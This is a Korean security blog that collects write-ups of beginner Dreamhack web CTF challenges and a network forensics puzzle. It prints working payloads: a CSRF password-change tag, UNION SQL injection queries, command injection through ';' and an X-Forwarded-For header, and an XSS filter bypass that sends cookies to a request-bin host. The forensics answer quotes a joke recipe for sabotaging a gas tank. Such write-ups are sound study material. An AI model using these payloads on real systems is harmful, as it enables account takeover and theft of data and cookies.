보안

Dreamhack - CSRF Advanced

보안공부 — Fri, 2 Jan 2026 08:31:26 +0900

[LEVEL 1 - CSRF Advanced - web]

문제 환경에 접속하면 위와 같은 웹페이지가 나온다.

먼저 문제 파일 다운로드를 통해 얻은 app.py를 살펴보자.

index()를 보아, admin으로 로그인하면 플래그값을 볼 수 있을 것이다.

vuln()를 보아, 대소문자 우회를 막는 필터링까지 하고 있는 것을 알 수 있다. 하지만 img 태그에 대한 필터링은 없다.

flag()를 보아, good이 나와야 한다.

change_password()를 보아, csrf 토큰값과 바꾸려는 비밀번호를 같이 넣으면 admin의 비밀번호를 바꿀 수 있다.

앞서 login()에서 확인한 코드를 바탕으로 위와 같이 파이썬 코드를 짜고 test.py로 저장한다.

이때 username은 admin으로 하고, remote_addr은 앞서 read_url()에서 확인한 서버의 로컬 ip 주소를 넣는다.

이 test.py를 실행하면 csrf 토큰이 출력되는 것을 볼 수 있다.

이제 flag 페이지로 이동 후, 비밀번호를 123으로(아무거나) 변경하기 위해 아래와 같이 img 태그로 작성하고 제출 버튼을 누른다.

<img src="/change_password?pw=123&csrftoken=7505b9c72ab4aa94b1a4ed7b207b67fb">

그러면 good이 뜬다.

이제 login 페이지로 와서 username에 admin, password에 123을 입력 후 로그인 버튼을 누른다.

admin으로 로그인에 성공했고, 플래그값을 확인할 수 있다.

플래그를 획득했다!

Network Forensics Puzzle contest - Puzzle #1: Ann's Bad AIM

보안공부 — Wed, 31 Dec 2025 15:21:44 +0900

[Puzzle #1: Ann's Bad AIM - forensics]

고전적인 네트워크포렌식 문제이다.

https://forensicscontest.com/2009/09/25/puzzle-1-anns-bad-aim

Puzzle #1: Ann’s Bad AIM – Network Forensics Puzzle Contest

Anarchy-R-Us, Inc. suspects that one of their employees, Ann Dercover, is really a secret agent working for their competitor. Ann has access to the company’s prize asset, the secret recipe. Security staff are worried that Ann may try to leak the company

forensicscontest.com

문제는 위 링크 참고

알아내야 하는 6가지는 아래와 같다.

IM 친구 이름
첫 번째 코멘트
전송한 파일 이름
파일 시그니처(처음 4바이트)
파일의 MD5 해시값
파일에 적혀있는 비법

문제를 읽어보니 AIM 이라는 걸 이용해서 풀어야 하는 것 같은데, 뭔지 몰라서 일단 검색부터 해본다.

https://wiki.wireshark.org/AIM

AIM - Wireshark Wiki

AOL Instant Messenger (AIM) XXX - add a brief AIM description here History XXX - add a brief description of AIM history Protocol dependencies TCP: Typically, AIM uses TCP as its transport protocol. The well known TCP port for AIM traffic is 5190. Example t

wiki.wireshark.org

AIM에 대해 알아보니, AIM은 AOL Instant Messenger의 약자로, 예전에 유행했던 1세대 메신저 프로그램 중 하나라고 한다.

즉, 위 Wireshark Wiki에서 언급하는 AIM은 이 메신저가 데이터를 주고 받을 때 사용하는 프로토콜을 의미한다.

추가로, 보통 TCP 5190번 포트를 사용한다고 한다.

일단 Wireshark에서 ip.addr==192.168.1.158 이걸로 검색해서 패킷 분석을 시작할 것이다.

패킷을 우클릭해서 TCP 스트림 따라가기를 누른다.

여기서 바로 1, 2, 3번에 해당하는 답을 알아낼 수 있다.

TCP Stream을 하나씩 넘기다보면 위와 같이 docx 파일이 전송된 패킷을 볼 수 있다.

docx 파일이라 헤더 시그니처(처음 4바이트)가 50 4b 03 04인 것을 확인할 수 있다.

즉, 4번에 해당하는 답도 알 수 있다.

쭉 내려서 푸터 시그니처도 보면 50 4b 05 06인 것을 확인할 수 있다.

현재 16진수 덤프 형식으로 보게 되어있는데 이걸 raw로 바꾸고, 앞서 확인한 헤더 시그니처부터 위 이미지의 빨간색 부분이 나오기 전까지를 모두 드래그해 복사한다.

HxD에 이걸 붙여넣고 .docx 확장자로 저장한다.

저장한 docx 파일을 열어보면 위와 같이 레시피가 나온다.

그럼 이제 6번에 대한 답도 해결한 것이다.

마지막으로 5번에 해당하는 답을 구하기 위해, cmd에서 아래와 같은 명령어로 MD5 해시값을 구한다.

certutil -hashfile [파일경로] [해시알고리즘]

최종적으로 문제에서 요구한 6가지의 답은 아래와 같다.

1. What is the name of Ann’s IM buddy?

Sec558user1

2. What was the first comment in the captured IM conversation?

Here's the secret recipe (이후 생략)

3. What is the name of the file Ann transferred?

recipe.docx

4. What is the magic number of the file you want to extract (first four bytes)?

50 4B 03 04

5. What was the MD5sum of the file?

8350582774e1d4dbe1d61d64c89e0ea1

6. What is the secret recipe?

Recipe for Disaster:

1 serving
Ingredients:
4 cups sugar
2 cups water
In a medium saucepan, bring the water to a boil. Add sugar. Stir gently over low heat until sugar is fully dissolved. Remove the saucepan from heat. Allow to cool completely. Pour into gas tank. Repeat as necessary.

풀이 완료!

Dreamhack - baby-union

보안공부 — Sun, 15 Jun 2025 10:11:15 +0900

[LEVEL 1 - baby-union - web]

이 문제는 union을 사용한 SQL Injection 문제이다.

문제 설명에 로그인 시 계정의 정보가 출력되는 웹 서비스라고 나와있다.

문제 환경에 접속하면 위와 같이 나온다.

app.py 코드를 보면 입력을 받은 후 계정의 정보를 조회하는 쿼리문을 만들어 DB에 전송하고 응답값을 출력하고 있다.

특히 20번째 줄을 보면 입력값을 바로 쿼리문에 넣고 있기 때문에 SQL Injection 공격이 가능하다는 것을 알 수 있다.

init.sql 코드는 위와 같은데, 해당 테이블명과 컬럼명은 실제 이름과 다르다고 문제 설명에 나와있다.

4개의 컬럼인 것을 알 수 있어 union을 이용해 쿼리문을 작성하면 된다.

flag가 있을만한 테이블을 찾아내기 위해 DB 구조와 속성에 대해 알 수 있는 information_schema를 사용해 아래와 같이 쿼리문을 작성할 수 있다.

apple'union select table_name,2,3,4 from information_schema.tables #

그러면 이렇게 해당 DB의 테이블을 확인할 수 있는데, 맨 아래에 있는 onlyflag 테이블에 플래그가 있을 것 같다.

이제 앞서 사용한 쿼리문에서 아래와 같이 일부 수정해 onlyflag 테이블의 컬럼 정보를 확인할 수 있다.

apple'union select column_name,2,3,4 from information_schema.columns where table_name='onlyflag'#

위와 같이 onlyflag 테이블의 컬럼 정보가 나온다.

idx와 sname은 id와 name을 나타내는 것 같아 일단 svalue, sflag, sclose를 확인해 본다.

이때 3번 자리는 확인이 불가하니, 아래와 같이 1, 2, 4번에 위치시킨 후 확인한다.

apple'union select svalue,sflag,3,sclose from onlyflag#

바로 플래그값이 출력된 것을 볼 수 있다.

플래그를 획득했다!

Dreamhack - what-is-my-ip

보안공부 — Sun, 4 May 2025 23:43:29 +0900

[LEVEL 1 - what-is-my-ip - web]

문제 설명에 /flag에 플래그 값이 있다고 힌트가 주어졌다.

문제 환경에 접속하면 가장 먼저 위와 같이 나의 IP 주소를 보여준다.

문제 파일을 다운로드 받으면 위와 같은 app.py가 있다.

request.access_route에서 1번째 요소를 변수 user_ip에 저장하고 없으면 request.remote_addr를 저장한다.

그러면 request.access_route는 뭘까?

Flask에서 request.access_route는 "전달된 헤더가 있는 경우 이는 클라이언트 IP에서 마지막 프록시 서버까지의 모든 IP 주소 목록"이다.

아래 문서를 참고했다.

https://flask.palletsprojects.com/en/stable/api/

여기까지는 알겠는데 이 다음이 막혀서 해당 워게임 댓글을 보았더니 X-Forwarded-For 라는 헤더를 파싱해야 한다고 한다.

그러면 X-Forwarded-For는 뭘까?

아래 문서를 읽어보면, "XFF 헤더는 HTTP 프록시나 로드 밸런서를 통해 웹 서버에 접속하는 클라이언트의 원 IP 주소를 식별하는 사실상의 표준 헤더"라고 한다. 그리고 access_route에서 X-Forwarded-For 헤더를 파싱한다고 한다.

https://developer.mozilla.org/ko/docs/Web/HTTP/Reference/Headers/X-Forwarded-For

X-Forwarded-For - HTTP | MDN

X-Forwarded-For (XFF) 헤더는 HTTP 프록시나 로드 밸런서를 통해 웹 서버에 접속하는 클라이언트의 원 IP 주소를 식별하는 사실상의 표준 헤더다. 클라이언트와 서버 중간에서 트래픽이 프록시나 로드

developer.mozilla.org

앞서 살펴봤듯 request.access_route에서 클라이언트 IP 목록의 1번째 요소를 변수 user_ip에 저장하니까, 위와 같이 Burp Suite에서 X-Forwarded-For 헤더를 추가해 1; cat /flag를 넣으면 플래그값을 얻을 수 있을 것이다.

정상적으로 플래그값이 출력된 것을 볼 수 있다.

플래그를 획득했다!

Dreamhack - Type c-j

보안공부 — Sun, 4 May 2025 23:03:43 +0900

[LEVEL 1 - Type c-j - web]

문제 환경에 접속하면 위와 같이 나온다.

문제 파일을 다운로드 받으면 위와 같이 check.php 코드가 있다.

여기서 알 수 있는 사실은 pw는 8자리이며, 1이라는 문자열을 sha1으로 암호화한 값이다.

반면 id는 랜덤 문자열 10자리인데, 자세히 보면 (int)$input_id == $id 이 조건문에서 input_id를 가져와 int 형변환을 해주고 있는 것을 볼 수 있다.

php 비교 연산자 취약점에 의해 input_id가 문자열로 시작하면 0이 되고, 숫자가 먼저 오면 먼저 온 숫자까지의 값으로 변환한다.

따라서 id는 0으로 10자리를 모두 채워주면 되는 것이다.

dreamhack cyberchef 페이지에서 1을 sha1으로 암호화한 결과값은 위와 같다.

pw는 8자리이므로, pw는 356a192b인 것이다.

앞서 구한 id와 pw을 각각 넣어주고 제출을 누른다.

ID pass 라는 문구와 함께 플래그 값이 출력된다.

플래그를 획득했다!

Dreamhack - out of money

보안공부 — Sun, 27 Apr 2025 23:44:23 +0900

[LEVEL 1 - out of money - web, misc]

무에서 유를 창조하라는 문제이다.

음수의 값이 허용된다면 그 행동의 반대를 하게 된다고 적혀있다.

문제 환경에 접속하면 위와 같이 나온다.

guest로 로그인했더니 위와 같이 나왔는데, 먼저 산타 사설 거래소에서 돈을 빌려야겠다.

본격적으로 빌리기 전에 문제 파일에서 제공된 소스코드의 주요 부분을 살펴보았다.

DHH가 1000이상이면서, 빌린 DHH이 0일 때, Flag 구매 버튼을 누를 수 있는 것으로 보인다.

일단 돈이 없으니까 DHH을 빌려야 한다.

1000 DHH을 먼저 빌렸다.

그러고 나서 밑부분에 1000 DHH를 DHC로 바꿨다.

산타 사설 거래소에서 나와 드림 유동성 풀로 이동했다.

그냥 바로 DHD를 빌릴 수는 없어서 일단 1000 DHC를 담보로 냈다.

그러고 나서 2000 DHD를 4번에 나눠서 빌렸다(한 번에 큰 금액을 빌리지 못한다).

다시 산타 사설 거래소로 돌아왔다.

지금 가지고 있는 2000 DHD를 DHH로 바꿨다.

그러고 나서 -1000 DHH 빌리기를 누르면 빌린 드핵코인이 0 DHH이 되고, 남은 드핵코인은 1000 DHH이 된다.

즉, 이제 Flag 구매 버튼을 누를 수 있는 조건이 갖춰진 것이다.

해당 버튼을 누르면 위와 같이 플래그를 바로 확인할 수 있다.

플래그를 획득했다!

Dreamhack - command-injection-chatgpt

보안공부 — Sun, 27 Apr 2025 23:24:42 +0900

[LEVEL 1 - command-injection-chatgpt - web]

command injection으로 플래그를 획득하는 간단한 문제이며, 플래그는 flag.py에 있다고 한다.

문제 환경에 접속하면 위와 같이 나온다.

ping을 날릴 수 있는 페이지가 있다.

문제 파일을 다운로드 받으면 위와 같은 코드를 볼 수 있는데, 딱히 필터링하고 있는 게 없어서 한 문장에 두 개의 명령어를 작성할 수 있는 세미콜론(;)을 이용하면 될 것 같다.

위와 같이 예시에 있던 8.8.8.8 그대로 치고 세미콜론(;)을 붙여준 다음, 바로 cat 명령어를 사용했다.

바로 플래그값이 출력된 것을 볼 수 있다.

플래그를 획득했다!

Dreamhack - simple_sqli_chatgpt

보안공부 — Mon, 21 Apr 2025 22:29:56 +0900

[LEVEL 1 - simple-sqli-chatgpt - web]

sql injection 문제인데 chatgpt랑 같이 풀어보라고 되어있다.

문제 환경에 접속하면 위와 나온다.

문제 파일을 다운로드 받으면 위와 같은 app.py가 있다.

여기서 초반 부분을 보면 users 테이블에 admin보다 guest를 먼저 넣는다는 걸 알 수 있다.

그래서 흔히들 아는 'or'1'='1 같은 건 사용할 수 없다.

그러면 union select를 사용하면 어떨까?

' union select * from users;-- -

위의 코드는 guest와 admin을 둘다 반환하지만, 기본이 오름차순이라 userid가 더 먼저인 admin이 먼저 나오게 되어 admin으로 로그인을 할 수 있을 것이다.

실제로 해당 코드를 적은 후 Login 버튼을 누르면 위와 같이 플래그가 출력되는 것을 볼 수 있다.

플래그를 획득했다!

Dreamhack - XSS Filtering Bypass

보안공부 — Mon, 21 Apr 2025 22:09:22 +0900

[LEVEL 1 - XSS Filtering Bypass - web]

XSS Filtering한 걸 우회하는 웹해킹 문제이다.

문제 환경에 접속하면 위와 같이 나온다.

문제 파일을 다운로드 받고 app.py를 열어보았는데 주목해야 하는 부분은 위의 xss_filter 함수이다.

문자열 script랑 on이랑 javascript:를 필터링하고 있다.

/flag 엔드포인트로 가보면 위와 같이 나오는데, 여기서 페이로드를 작성해야 한다.

앞서 살펴본 필터링 문자열을 우회하기 위해 script 태그는 script 사이에 script를 끼워넣어서 중간꺼만 ""로 바뀌게 해서 최종적으로 script가 되도록 해야 한다.

location은 "on"에 필터링이 되면 안되므로 "locatio"과 "n"으로 쪼개야 한다.

그러면 사용해야할 페이로드는 아래와 같다.

<scriscriptpt>document["locatio"+"n"].href="여기에 드림핵 request bin 주소/?flag="+document.cookie;</scriscriptpt>

위 코드에 드림핵에서 제공하는 request bin 원격 서버 주소로 바꾸고 사용하면 된다.

이제 위와 같이 플래그값을 볼 수 있다.

플래그를 획득했다!

Dreamhack - [wargame.kr] tmitter

보안공부 — Sun, 13 Apr 2025 22:45:47 +0900

[LEVEL 1 - tmitter - web]

문제 환경에 접속하면 위와 같이 로그인과 회원가입을 할 수 있는 버튼이 있다.

로그인 버튼을 누르면 좌측 상단에 조그맣게 로그인할 수 있는 폼이 생긴다.

회원가입 버튼을 누르면 위와 같은 페이지가 나오는데, id는 최소 4자, ps는 최소 7자라고 되어있다.

admin1이라는 아이디로 일단 회원가입을 하고 접속해봤다.

hi hello라고 글을 써봤는데, 위에 admin이라는 계정이 남겨놓은 글이 보인다. 자기 id로 로그인 할 수 있냐고 적혀있다.

개발자도구를 열어서 소스코드를 봐도 맨 아래 주석으로 admin 계정으로 회원가입을 해야한다는 힌트가 나와있다.

그리고 소스코드에 char형 id의 maxlength가 32바이트로 되어있는 것을 확인했다.

mysql은 해당 최대 길이를 넘는 문자열이 들어오면 해당 최대 길이값까지만 잘라서 입력을 받는다는 특성이 있어서 이걸 이용해야 한다.

버프스위트 실행 후, id는 admin으로 해놓고 비번은 내맘대로 admin1234로 친 상태에서 intercept on으로 바꾸고 join 버튼을 눌렀다.

여기서 id 부분을 총 32바이트가 넘도록 admin 뒤에 공백을 넣고 마지막에 1(아무 문자열)을 넣었다.

이 상태에서 forward를 누르면 회원가입이 완료된다.

이제 admin / admin1234로 로그인하면 된다.

로그인하면 위와 같이 플래그값이 출력된 페이지가 나온다.

플래그를 획득했다!